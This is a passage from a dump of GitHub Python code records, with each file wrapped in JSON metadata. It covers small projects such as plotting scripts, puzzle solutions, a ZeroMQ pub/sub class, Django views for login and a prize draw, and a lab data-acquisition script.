\"abcde\")\nprint(res)\n\ns.findTheDifference","repo_name":"codeAligned/codingChallenges","sub_path":"codewars/find_difference.py","file_name":"find_difference.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38558641885","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport warnings\n\ndef desc_stats(data): \n # Convert the dataset to a Pandas DataFrame\n Auto = pd.DataFrame(data)\n\n # Display a brief summary of the dataset\n print(Auto.info())\n\n # Glimpse the first few rows of the dataset\n print(Auto.head())\n\n # Summary of the numeric variables\n print(Auto.describe())\n \n return None\n\ndef box_visual(data):\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n sns.set_theme(style=\"ticks\", palette=\"pastel\")\n sns.boxplot(x=\"mpg\", y=\"weight\", palette=\"Blues\", data=data)\n plt.show()\n\ndef main():\n path = \"https://raw.githubusercontent.com/nogibjj/MiniProject9_Kelly_Tong/main/test_Auto.csv\"\n df = pd.read_csv(path)\n print(desc_stats(df))\n box_visual(df)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nogibjj/MiniProject9_Kelly_Tong","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40926334024","text":"import string\nfrom typing import List, Tuple\n\n\ndef LinearizedTwoValues(val_1: float, val_2: float, vec_len: int) -> List[float]:\n \"\"\"create a list of values according to a given length where the values go up \n with the same step size from one given value to another.\n\n Args:\n val_1 (float): initial value\n val_2 (float): final value\n vec_len (int): length 
of new vector\n\n Returns:\n List[float]: A linear list of values\n \"\"\"\n vector_values = []\n diff = (val_2 - val_1)/vec_len\n\n for i in range(vec_len):\n val_new = val_1 + i * diff\n vector_values.append(val_new)\n\n return vector_values\n\n\ndef ExpandPath(path):\n path_new = []\n for dot in path:\n x_val = (dot[0] + 0.5) * 20\n y_val = (dot[1] + 1) * 20\n new_dot = [x_val, y_val]\n path_new.append(new_dot)\n return path_new\n\n\ndef folderName2Sections(folder_name: string):\n if folder_name == \"A_before\" or folder_name == \"csv_correction\":\n sections = [\"A\"]\n elif folder_name == \"A_after\":\n sections = [\"B\", \"C\", \"D\", \"E\"]\n elif folder_name == \"B_before\":\n sections = [\"A\", \"B\"]\n elif folder_name == \"B_after\":\n sections = [\"C\", \"D\", \"E\"]\n elif folder_name == \"C_before\":\n sections = [\"A\", \"B\", \"C\"]\n elif folder_name == \"C_after\":\n sections = [\"D\", \"E\"]\n elif folder_name == \"D_before\":\n sections = [\"A\", \"B\", \"C\", \"D\"]\n elif folder_name == \"D_after\":\n sections = [\"E\"]\n elif folder_name == \"full_path\":\n sections = [\"A\", \"B\", \"C\", \"D\", \"E\"]\n\n return sections\n\n\ndef linearExperiments(val_1: float, val_2: float, resolution: float, section: string) -> List[float]:\n \"\"\"Create a linear list of values for the waypoints toward the goal.\n\n Args:\n val_1 (float): initial value\n val_2 (float): final value\n vec_len (int): length of new vector\n section (string): section of the path of the real world experiments\n\n Returns:\n List[float]: A linear list of values\n \"\"\"\n if section in {\"C\", \"E\"}:\n vec_len = round(resolution*1.5)\n else:\n vec_len = resolution\n\n return LinearizedTwoValues(val_1, val_2, vec_len)\n\n\ndef AECDDataLinear(path_exe_waypoints, file_name: string):\n path_exe = ExpandPath(path_exe_waypoints)\n resolution = 20 # TODO: change to true res\n sections = folderName2Sections(file_name)\n\n path_exe_linear = []\n for i in range(2):\n vec = []\n for j in range(len(sections)):\n vec = vec + linearExperiments(path_exe[j][i], path_exe[j+1][i],\n resolution, sections[j])\n path_exe_linear.append(vec)\n\n return path_exe_linear[0], path_exe_linear[1]\n\n\ndef VOADataExpanded(x_mean: List[float], y_mean: List[float], x_var: List[float], y_var: List[float]):\n x_new = []\n for x in x_mean:\n x_val = (x + 0.5) * 20\n x_new.append(x_val)\n x_mean = x_new\n\n y_new = []\n for y in y_mean:\n y_val = (y + 1) * 20\n y_new.append(y_val)\n y_mean = y_new\n\n x_var_new = []\n for x in x_var:\n x_val = x * 20\n x_var_new.append(x_val)\n x_var = x_var_new\n\n y_var_new = []\n for y in y_var:\n y_val = y * 20\n y_var_new.append(y_val)\n y_var = y_var_new\n\n return x_mean, y_mean, x_var, y_var\n\n\ndef VOADataExtractHelpAtI(i: int):\n x_mean, y_mean, x_var, y_var = VOADataRaw()\n x_mean, y_mean, x_var, y_var = VOADataExpanded(\n x_mean, y_mean, x_var, y_var)\n\n x_mean, y_mean, x_var_new, y_var_new = VOADataLinear(\n x_mean, y_mean, x_var, y_var)\n\n x_var_correction = x_var[i]\n y_var_correction = y_var[i]\n index_correction = x_var_new.index(x_var_correction)\n for j in range(len(x_var_new) - index_correction):\n x_var_new[j + index_correction] -= x_var_correction\n y_var_new[j + index_correction] -= y_var_correction\n\n return x_mean, y_mean, x_var_new, y_var_new\n\n\ndef VOADataLinear(x_mean: List[float], y_mean: List[float], x_var: List[float], y_var: List[float]):\n resolution = 20\n values = [x_mean, y_mean, x_var, y_var]\n\n values_linear = []\n for vec_value in values:\n vec_val_A = 
linearExperiments(\n vec_value[0], vec_value[1], resolution, \"A\")\n vec_val_B = linearExperiments(\n vec_value[1], vec_value[2], resolution, \"B\")\n vec_val_C = linearExperiments(\n vec_value[2], vec_value[3], resolution, \"C\")\n vec_val_D = linearExperiments(\n vec_value[3], vec_value[4], resolution, \"D\")\n vec_val_E = linearExperiments(\n vec_value[4], vec_value[5], resolution, \"E\")\n values_linear.append(vec_val_A + vec_val_B +\n vec_val_C + vec_val_D + vec_val_E)\n\n return values_linear[0], values_linear[1], values_linear[2], values_linear[3]\n\n\ndef VOADataRaw() -> Tuple[List[float], List[float], List[float], List[float]]:\n \"\"\"Data to calculate the VOA according to the location uncertainty of the agent\n\n Returns:\n Tuple[List[float], List[float], List[float], List[float]]: \n x_mean - location mean over the X axis\n y_mean - location mean over the Y axis\n x_sigma - location sigma over the X axis\n y_sigma - location sigma over the Y axis \n \"\"\"\n x_mean = [-0.028375, 0.954354167, 1.5180625,\n 2.389979167, 3.347729167, 4.1971875]\n y_mean = [0.000333333, 0.001625, 0.7801875, -\n 0.376895833, -0.3968125, 0.781916667]\n\n x_sigma = [0.000855785, 0.009477892, 0.022112197,\n 0.03022457, 0.028011764, 0.036931409]\n y_sigma = [0.000465215, 0.014023169, 0.022906405,\n 0.045606768, 0.071284017, 0.094513136]\n\n return x_mean, y_mean, x_sigma, y_sigma\n","repo_name":"CLAIR-LAB-TECHNION/VOA","sub_path":"code/experiments_data.py","file_name":"experiments_data.py","file_ext":"py","file_size_in_byte":5799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30748600728","text":"import PySimpleGUI as sg\r\nimport sys\r\n\r\n# GUI setup\r\nlayout = [\r\n [sg.Text(\"Input desired accuracy and max 300s:\")],\r\n [sg.Text('Accuracy (to nearest hundredth): '), sg.Input(size=(10, 1))],\r\n [sg.Text('300s: '), sg.Input(size=(10, 1))],\r\n [sg.Text('100s: '), sg.Input(size=(10, 1))],\r\n [sg.Text('50s: '), sg.Input(size=(10, 1))],\r\n [sg.Text('Miss: '), sg.Input(size=(10, 1))],\r\n [sg.OK(), sg.Exit()]\r\n]\r\nwindow = sg.Window('osu! Reverse Accuracy Calculator').Layout(layout)\r\n\r\n\r\ndef process(three):\r\n hundred, maximum = 0, three\r\n while True:\r\n testacc = round(((100 * hundred + 300 * three) /\r\n (300 * (hundred + three))) * 100, 2)\r\n if testacc <= acc:\r\n break\r\n three -= 1\r\n hundred += 1\r\n if maximum > three and testacc != acc:\r\n three += 1\r\n hundred -= 1\r\n testacc = round(((100 * hundred + 300 * three) /\r\n (300 * (hundred + three))) * 100, 2)\r\n sg.Popup(str(three) + \"/\" + str(hundred) + \"/0/0\" + \" for \" + str(acc) + \"% if FC (\" + str(testacc) + \"%)\")\r\n\r\n\r\nwhile True:\r\n while True:\r\n event, (acc, threehundred, onehundred, fifty, miss) = window.Read()\r\n if event is None or event == \"Exit\":\r\n sys.exit()\r\n try:\r\n acc, threehundred, onehundred, fifty, miss =\\\r\n float(acc), int(threehundred), int(onehundred), int(fifty), int(miss)\r\n threehundred = threehundred + onehundred + fifty + miss\r\n if 0 <= float(acc) <= 100:\r\n break\r\n else:\r\n sg.Popup(\"That is an invalid input.\")\r\n except ValueError:\r\n sg.Popup(\"ERROR\", \"That is an invalid input.\")\r\n process(threehundred)\r\n","repo_name":"SCRedstone/reverse-accuracy","sub_path":"osu! Reverse Accuracy Calculator.py","file_name":"osu! 
Reverse Accuracy Calculator.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23434100741","text":"import sys\r\ndef Nstrat(N,K):\r\n\tscoreN=0\r\n\tN_l = [x for x in N]\r\n\tK_l = [x for x in K]\r\n\twhile len(N_l)>0:\r\n\t\tif N_l[-1] > K_l[-1]:\r\n\t\t\tdel N_l[-1]\r\n\t\t\tdel K_l[0]\r\n\t\t\tscoreN = scoreN+1\r\n\t\telse:\r\n\t\t\tfor k in range(len(K_l)):\r\n\t\t\t\tif K_l[k] > N_l[-1]:\r\n\t\t\t\t\tdel K_l[k]\r\n\t\t\t\t\tbreak\r\n\t\t\tdel N_l[-1]\r\n\treturn scoreN\r\n\t\r\ndef Dstrat(N,K):\r\n\tscoreN=0\r\n\tN_l = [x for x in N]\r\n\tK_l = [x for x in K]\r\n\twhile len(N_l)>0:\r\n\t\tindex = None\r\n\t\tfor i in range(len(N_l)):\r\n\t\t\tif N_l[i] > K_l[0]:\r\n\t\t\t\tindex = i\r\n\t\t\t\tbreak\r\n\t\tif index != None:\r\n\t\t\tscoreN = scoreN+1\r\n\t\t\tdel N_l[index]\r\n\t\t\tdel K_l[0]\r\n\t\telse:\r\n\t\t\tdel N_l[0]\r\n\t\t\tdel K_l[0]\r\n\treturn scoreN\r\n\t\t\t\t\r\n\r\nsys.stdin = open('input.in','r')\r\nsys.stdout = open('output.out','w+')\r\n\t\t\t\t\r\nT = int(input())\r\nfor i in range(1,T+1):\r\n\tN = int(input())\r\n\tN = [float(x) for x in input().split()]\r\n\tK = [float(x) for x in input().split()]\r\n\tN.sort()\r\n\tK.sort()\r\n\tprint('Case #{CaseNo}: {Dct} {Nrm}'.format(CaseNo=i,Dct=Dstrat(N,K),Nrm=Nstrat(N,K)))\r\n\t\r\nsys.stdin = sys.__stdin__\r\nsys.stdout = sys.__stdout__\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1801.py","file_name":"1801.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21226772826","text":"srclst = [1,5,2,7,4,9]\r\n\r\ndef cal_num1_num2(sum,srclst):\r\n lst = []\r\n for i in range(len(srclst) - 1):\r\n x = srclst[i]\r\n for j in range(i + 1, len(srclst)):\r\n y = srclst[j]\r\n if sum == x + y:\r\n lst.append((x,y))\r\n\r\n return lst\r\n\r\nprint(cal_num1_num2(9,srclst))\r\n\r\n","repo_name":"magedus/python-11","sub_path":"quzhenji/week8/W8_calcu_twonum.py","file_name":"W8_calcu_twonum.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"72565100354","text":"'''\n\nDescription:\n\nFind the sum of all left leaves in a given binary tree.\n\nExample:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nThere are two left leaves in the binary tree, with values 9 and 15 respectively. 
Return 24.\n\n'''\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def sumOfLeftLeaves(self, root: TreeNode) -> int:\n \n # ---------------------------\n def dfs(node, attr):\n \n if not node:\n \n # base case:\n # empty node or empty tree\n return 0\n \n \n if not node.left and not node.right:\n\n # base case:\n # current node is leaf node\n\n return node.val if attr == 'left' else 0\n\n \n # general case:\n return dfs(node.left, 'left') + dfs(node.right, 'right')\n \n # ---------------------------\n return dfs(node=root, attr='root')\n\n\n# n : the number of nodes in binary tree\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of DFS, which is of O( n )\n\n## Space Complexity: O( n )\n#\n# The overhead in space is the storage for recursion call stack, which is of O( n )\n\n\nimport unittest\n\nclass Testing( unittest.TestCase ):\n\n def test_case_1( self ):\n \n root = TreeNode( 3 )\n\n root.left = TreeNode( 9 )\n root.right = TreeNode( 20 )\n\n root.right.left = TreeNode( 15 )\n root.right.right = TreeNode( 7 )\n\n result = Solution().sumOfLeftLeaves( root=root )\n self.assertEqual( result, 24 )\n\n\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"brianchiang-tw/leetcode","sub_path":"2020_August_Leetcode_30_days_challenge/Week_4_Sum of Left Leaves/by_reursion.py","file_name":"by_reursion.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"31394905445","text":"import threading\nimport queue\n\nimport zmq\n\nfrom babylog.logger import babylogger\nfrom babylog.deserialize import LoggedPrediction\n\n\nclass Publisher:\n def __init__(\n self, address: str, port: int, topic: str, context_io_threads: int = 1\n ):\n self._topic = topic\n self._context = zmq.Context(context_io_threads)\n try:\n self._publisher = zmq.Socket(self._context, zmq.PUB)\n self._publisher.bind(f\"tcp://{address}:{port}\")\n babylogger.info(\n f\"Publisher with topic ({topic}) succesfully binded to port {port}\"\n )\n except Exception as e:\n babylogger.error(f\"could not initialize publisher: {e}\")\n raise ValueError(f\"could not initialize publisher: {e}\")\n\n def send(self, data: bytes) -> bool:\n try:\n if self._publisher.send_string(self._topic, zmq.SNDMORE) is not None:\n babylogger.error(1)\n return False\n if self._publisher.send(data) is not None:\n babylogger.error(2)\n return False\n return True\n except Exception as e:\n babylogger.error(f\"exception while sending with publisher: {e}\")\n return False\n\n def shutdown(self):\n self._publisher.close()\n\n\nclass Subscriber:\n def __init__(\n self,\n address: str,\n port: int,\n topic: str,\n max_data_history: int = 10,\n context_io_threads: int = 1,\n ):\n self._topic = topic\n self._max_data_history = max_data_history\n self._shutdown = False\n\n self._context = zmq.Context(context_io_threads)\n self._subscriber = zmq.Socket(self._context, zmq.SUB)\n self._subscriber.setsockopt(zmq.RCVTIMEO, 1000)\n\n try:\n self._subscriber.connect(f\"tcp://{address}:{port}\")\n self._subscriber.setsockopt_string(zmq.SUBSCRIBE, topic)\n babylogger.info(\n f\"subscriber with topic ({topic}) successfully connected to port {port}\"\n )\n except Exception as e:\n babylogger.error(f\"could not setup subscriber: {e}\")\n raise\n self._mutex = threading.Lock()\n self._data = b\"\"\n self._data_queue = 
queue.Queue(maxsize=1000)\n threading.Thread(target=self.receive).start()\n\n def shutdown(self):\n babylogger.info(f\"shutting down {self._topic} stream.\")\n self._shutdown = True\n\n def receive(self):\n while not self._shutdown:\n try:\n if self._subscriber.poll(1000, zmq.POLLIN):\n recv_msgs = self._subscriber.recv_multipart()\n assert len(recv_msgs) == 2\n self._mutex.acquire()\n self._data = recv_msgs[1]\n self._data_queue.put(self._data)\n self._mutex.release()\n else:\n pass\n except Exception as e:\n babylogger.error(f\"could not receive message: {e}\")\n babylogger.info(f\"{self._topic} stream shut down\")\n\n @property\n def data(self):\n self._mutex.acquire()\n data = self._data\n self._mutex.release()\n\n return data\n\n @property\n def logged_data(self, max_timeout=1):\n try:\n data = self._data_queue.get(timeout=max_timeout)\n except Exception as e:\n babylogger.info(f\"could not get message: {e}\")\n return None\n return LoggedPrediction.from_bytes(data)\n","repo_name":"thebabylonai/babylog","sub_path":"python/src/babylog/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"61"} +{"seq_id":"37158155192","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse\nfrom app01 import models\nimport random\nimport datetime\n\n\ndef logout(request):\n request.session.clear()\n logout_json = {'session_delete': True}\n return JsonResponse(logout_json)\n\n\ndef login_check(request):\n res_json = [\n {\n \"res_success\": None,\n },\n {\n \"res_success\": True,\n },\n {\n \"res_success\": False,\n }\n ]\n # 接受ajax传过来的username,password,remember\n username = request.POST.get('username')\n password = request.POST.get('password')\n remember = request.POST.get('remember')\n if username == '' or password == '':\n return JsonResponse(res_json[0])\n # print(username)\n is_exist = models.User_info.objects.filter(user_account=username, user_password=password)\n # print(is_exist)\n if is_exist.exists():\n request.session['username'] = username\n request.session['password'] = password\n request.session['isLogin'] = True\n request.session.set_expiry(0)\n ret = JsonResponse(res_json[1])\n if remember == 'true':\n ret.set_cookie('username', username + '|' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n return ret\n else:\n return JsonResponse(res_json[2])\n\n\ndef delete_date(request):\n delete_id = request.POST.get('delete_id')\n models.User_info.objects.filter(user_id=delete_id).delete()\n date_is_delete = {'isdelete': True}\n return JsonResponse(date_is_delete)\n\n\ndef touch_prize(request):\n count = int(request.POST.get('count'))\n username = request.session.get('username')\n try:\n account = models.User_info.objects.get(user_account=username)\n except ObjectDoesNotExist:\n return JsonResponse({'success': False, 'log': '登录已过期,请重新登录'})\n if account.user_money < count * 100:\n return JsonResponse({'success': False, 'log': '点券不足,请充值'})\n '''\n 抽奖的算法\n 10连必出A\n 随机数(1-1000)\n 1-300是金币\n 301-500是砖石\n 501-700是改名卡\n 701-820 B英雄\n 821-900 B皮肤\n 901-930 A英雄\n 931-955 S英雄\n 956-975 A皮肤\n 976-990 S皮肤\n 991-1000 SSR 英雄\n '''\n prize = {}\n\n def one_prize():\n # 数组,10个,每个元素是一个字典,字典有id,name,rate键\n awards_rate = models.Lucky_award.objects.all()\n sum = 0\n random_num = random.randint(1, 1000)\n for ele in awards_rate:\n if ele.award_rate * 1000 + sum >= random_num >= sum:\n return ele.award_name\n sum += ele.award_rate * 1000\n\n if count 
== 10:\n for i in range(1, 11):\n prize[i] = one_prize()\n account.user_money = account.user_money - count * 100\n account.save()\n else:\n prize[1] = one_prize()\n account.user_money = account.user_money - count * 100\n account.save()\n # after the draw, the won items must be saved to the user's inventory\n # prize is the draw-result dict, account is the account record\n for award in prize.values():\n store = models.User_stores.objects.get(user_name=account.user_id,\n store_name=models.Lucky_award.objects.get(award_name=award).award_id)\n store.store_num = store.store_num + 1\n store.save()\n return JsonResponse({'success': True, 'user_money': account.user_money, 'prize': prize})\n\n\ndef danmu_send(request):\n # danmu (bullet comment) text\n # User_info.objects.get raises ObjectDoesNotExist when no user matches, so guard it with try/except\n try:\n userId = models.User_info.objects.get(user_account=request.session.get('username'))\n except ObjectDoesNotExist:\n return JsonResponse({'res_success': False})\n danmu_value = request.GET.get('danmu_value')\n # server time\n danmu_time = (datetime.datetime.now() + datetime.timedelta(seconds=5)).strftime(\"%Y-%m-%d %H:%M:%S\") # server time\n is_success = models.Danmu.objects.create(\n user_id=userId,\n danmu_name=danmu_value,\n danmu_time=danmu_time\n )\n if is_success:\n return JsonResponse({'res_success': True})\n\n\ndef get_danmu(request):\n try:\n models.User_info.objects.get(user_account=request.session.get('username'))\n except ObjectDoesNotExist:\n return JsonResponse({'message': False})\n get_time = request.GET.get('get_time')\n # get_time = '2022-01-27 16:01:28'\n # print('fetching danmu posted at', get_time)\n # foreign key name__parent table field\n list_danmu = list(models.Danmu.objects.filter(danmu_time=get_time).values('user_id__user_name', 'danmu_name'))\n return JsonResponse({'message': True, 'content': list_danmu})\n","repo_name":"zhengyc-debug/zhengyc_private_repository","sub_path":"django_project/app01/ajax_views.py","file_name":"ajax_views.py","file_ext":"py","file_size_in_byte":4699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36476955731","text":"#!/bin/env/python\n#! -*- coding: utf-8 -*-\n\n###################\n## General imports ##\n###################\n\nfrom matplotlib.pyplot import plot, xlabel, ylabel, axis, hist, figure, show, axis, subplots, xlim, ylim, title, semilogx, legend, savefig \nfrom mpl_toolkits.mplot3d import axes3d, Axes3D \nimport numpy\nimport itertools\nimport os\n\n###################\n## Options ##\n###################\n\ntest = False \nruntime_debug = False\nsave_data = True\nload_data = False\nshort_experiment = False\nverbose = False\naquisition = True \nsave_scripts = True if aquisition else False\n\nif (os.environ['USERNAME']=='dphy-reuletlab') :\n python_2_7_scripts_root = \"C:\\\\Projets\\\\Time_Domain_Optic\\\\Python_2_7\"\nelse :# (os.environ['USERNAME']=='Sous-sol') :\n python_2_7_scripts_root = \"C:\\\\Users\\Sous-sol\\\\Desktop\\\\CODES\\\\Python_2_7\"\nos.chdir(python_2_7_scripts_root) \n\nexp_dir = 'Default'\n\n# this has to be a list of tuples to preserve order\npyhegel_tools_local_dependencies = [\n ('SII_aCorr' , '..\\\\SII_aCorr\\\\Pyhegel_tools_local.py'),\n]\n\n#########################################################\n## Set current dir / path and / initialize save folder ##\n#########################################################\n\nfrom Scripts_utitilities import *\nscripts,paths = set_exp_environment(python_2_7_scripts_root,exp_dir=exp_dir,test=test)\n\nif aquisition : make_dir( paths['saves'] ) # Tell pyhegel to make the saves directory and to save data there. This is pyhegel specific and cannot be put into a module ... 
\n\nscripts.update(pyhegel_tools_local_dependencies)\n\n###################\n## Custom imports ##\n###################\n\nfrom General_tools import *\nfrom Experiment import * \nfrom Experiment_helper import *\n\n# C++ bindings\n# if aquisition : from acorrs_otf import * \n# if aquisition : from time_quadratures import * \n# if aquisition : from histograms import * \n# if aquisition : from special_functions import * \n\n########################\n## LOAD PYHEGEL TOOLS ##\n########################\n\"\"\" \nPyhegel functions and virtual instruments (depend on plotting functions)\n\"\"\"\nexecfile(paths['pyhegel_wrappers']) # TODO convert to module\nfor k,_ in pyhegel_tools_local_dependencies : # I don't think this can be done in a function?\n execfile(scripts[k])\nexecfile(scripts['pyhegel_tools_local']) \n\n#################\n## SCRIPT COPY ##\n#################\n\"\"\"\n Save all scripts into paths['saves']\n\"\"\"\nif save_scripts : save_all_scripts(paths,scripts)\n\n#############################\n## EXPERIMENTAL PARAMETERS ##\n#############################\n\n# execfile(scripts['parameters']) # Is this necessary anymore?\n\n# Kernels params\nl_kernel = (1<<8) + 1 \n\n# Acquisition params\ndt = 0.03125 \n\n# Guzik params\ngain_dB = 9.0\n\n# SWEEP PARAMETERS\n\nif short_experiment :\n Vdc = r_[linspace(0.1,1.2,3)[:-1],linspace(1.2,4,3)]\nelse :\n Vdc = r_[linspace(0.1,1.2,6)[:-1],linspace(1.2,4,5)]\n\noptions = {'test':test,'verbose':verbose}\n\nif not load_data :\n device_options = {'debug':runtime_debug}\n yoko = Yoko_wrapper(**device_options)\n conditions = (n_measures,Vdc,)\n devices = (yoko,) \n SII_mes = SII_aCorr(conditions,devices,**options)\n SII_mes.measure()\n SII_mes.update_analysis()\n if save_data : SII_mes.save_data(paths['saves'])\n \n data = SII_mes.get_data_dict()\n SII_anal = SII_anal(conditions,data,**options)\n SII_anal.update_analysis()\n if save_data : SII_anal.save_data(paths['saves'])\nelse :\n data_folder = paths['pwd'] +'\\\\20-11-13_10h27' if not(test) else paths['experiments_root'] +'\\\\TEST'\n filename = 'data_20-11-16_09h26.npz'\n SII_anal = SII_anal.load_data(data_folder,filename)\n\n","repo_name":"SimonBolducBeaudoin/Experiement_libs","sub_path":"0-Aquisition_template.py","file_name":"0-Aquisition_template.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36893572105","text":"from .base import BaseExcelWriter\n\n\nclass UsersToExcel(BaseExcelWriter):\n EXCLUDE_FIELDS = (\n \"verification_code\",\n \"telegram_id\",\n \"telegram_chat_id\",\n \"ethereum_wallet\",\n \"btc_wallet\",\n \"simba_wallet\",\n \"password\",\n \"user_eth_addresses\",\n \"user_btc_addresses\",\n \"secret_2fa\",\n \"signed_addresses\",\n \"recover_code\",\n )\n\n def _prepare_addresses(self):\n for row in self.data:\n for field in (\"user_eth_addresses\", \"user_btc_addresses\"):\n for i, val in enumerate(row.get(field, [])):\n row[f\"{field}/{i + 1}\"] = val.get(\"address\")\n\n return\n\n def proceed(self):\n self._prepare_addresses()\n\n x = 1\n y = 0\n for user in self.data:\n y = self._write_header(list(user.keys()), x=0, y=y, level=0, exclude_keys=self.EXCLUDE_FIELDS)\n self._write_row(user, x, level=0, exclude_keys=self.EXCLUDE_FIELDS)\n x += 1\n\n self.wb.close()\n return 
self.output.getvalue()\n","repo_name":"amosov00/simba","sub_path":"backend/core/mechanics/excel/export_users.py","file_name":"export_users.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1639723432","text":"from typing import List\n\n\nclass Solution:\n def findKthPositive(self, arr, k):\n beg, end = 0, len(arr)\n while beg < end:\n mid = (beg + end) // 2\n if arr[mid] - mid - 1 < k:\n beg = mid + 1\n else:\n end = mid\n return end + k\n\n\nif __name__ == '__main__':\n arr = [2, 3, 4, 7, 11]\n k = 5\n print(Solution().findKthPositive(arr, k))\n","repo_name":"amogchandrashekar/Leetcode","sub_path":"Easy/Kth Missing Positive Number.py","file_name":"Kth Missing Positive Number.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33740238561","text":"import tkinter as tk\nfrom tkinter.ttk import Notebook, Frame\n\nfrom application_gui.detection_view import DetectionFrame\nfrom application_gui.evaluation_view import EvaluationFrame\nfrom application_gui.train_spm_view import TrainSpmFrame\nfrom application_gui.train_texture_view import TrainTextureFrame\n\n\nclass EvaluatorApplication(Frame):\n def __init__(self, parent):\n Frame.__init__(self, parent)\n self.create_windows()\n\n def create_windows(self):\n notebook = Notebook(self.master)\n\n tab_evaluation = Frame(notebook)\n notebook.add(tab_evaluation, text=\"Evaluator\")\n EvaluationFrame(tab_evaluation)\n\n tab_train_spm = Frame(notebook)\n notebook.add(tab_train_spm, text=\"Train SPM\")\n TrainSpmFrame(tab_train_spm)\n\n tab_train_texture = Frame(notebook)\n notebook.add(tab_train_texture, text=\"Train texture\")\n TrainTextureFrame(tab_train_texture)\n\n tab_detection = Frame(notebook)\n notebook.add(tab_detection, text=\"Detection\")\n DetectionFrame(tab_detection)\n\n notebook.pack(expand=1, fill=\"both\")\n\n\nif __name__ == '__main__':\n win = tk.Tk()\n EvaluatorApplication(win)\n win.mainloop()\n","repo_name":"StefanSebastian/SkinDetectionInImages","sub_path":"implementation/application_gui/main_view.py","file_name":"main_view.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1351376952","text":"from morpcc.crud.model import CollectionUI, ModelUI\n\n\nclass ApplicationModelUI(ModelUI):\n pass\n\n\nclass BehaviorableApplicationModelUI(ApplicationModelUI):\n def __new__(cls, request, model, collection):\n behaviors = model.behaviors()\n if not behaviors:\n return ApplicationModelUI(request, model, collection)\n\n markers = [behavior.modelui_marker for behavior in behaviors]\n markers.append(ApplicationModelUI)\n klass = type(\n \"ApplicationModelUI\", tuple(markers), {\"__path_model__\": ApplicationModelUI}\n )\n return klass(request, model, collection)\n\n\nclass ApplicationCollectionUI(CollectionUI):\n modelui_class = BehaviorableApplicationModelUI\n\n columns = [\n {\"title\": \"Title\", \"name\": \"title\"},\n {\"title\": \"Description\", \"name\": \"description\"},\n {\"title\": \"Actions\", \"name\": \"structure:buttons\"},\n ]\n","repo_name":"morpframework/morpcc_ttw","sub_path":"morpcc_ttw/application/modelui.py","file_name":"modelui.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70522204035","text":"def 
remove_x(inputString):\n if len(inputString)==0:\n return \"\"\n smallStringOutput = remove_x(inputString[1:])\n if inputString[0]==\"x\":\n return \"\"+smallStringOutput\n else:\n return inputString[0]+smallStringOutput\n\nstringForInput = str(input())\nprint(remove_x(stringForInput))\n ","repo_name":"asingh88029/dsa_python","sub_path":"recursion/remove_x_from_string.py","file_name":"remove_x_from_string.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23517985701","text":"import sys\n\ndef answer_problem(file_name, f_solve):\n with open(file_name, 'r') as f:\n n = int(f.readline())\n output_str = '\\n'.join(\n \"Case #{0}: {1}\".format(i+1, f_solve(input_str))\n for i, input_str in enumerate(f.read().splitlines()))\n return output_str\n\n\n\ndef solve_a(input_str):\n letters_seen = set()\n all_letters = set(str(x) for x in range(10))\n incr = int(input_str)\n if incr == 0:\n return \"INSOMNIA\"\n x = 0\n while letters_seen != all_letters:\n x += incr\n letters_seen |= set(str(x))\n return str(x)\n\ndef solve_b(input_str):\n num_flips = 0\n while input_str != '+' * len(input_str):\n if input_str.find('+') == -1:\n return num_flips + 1\n elif input_str.find('+') < input_str.find('-'):\n input_str = flip_n_pancakes(input_str, \n input_str.find('-'))\n else:\n input_str = flip_n_pancakes(input_str, \n input_str.find('+'))\n num_flips += 1\n return num_flips\n\ndef flip_n_pancakes(pancake_pile, n):\n return ''.join({'+':'-', '-': '+'}[x] for x in \n pancake_pile[:n][::-1]) + pancake_pile[n:]\n\n\ndef answer_problem_special(file_name, 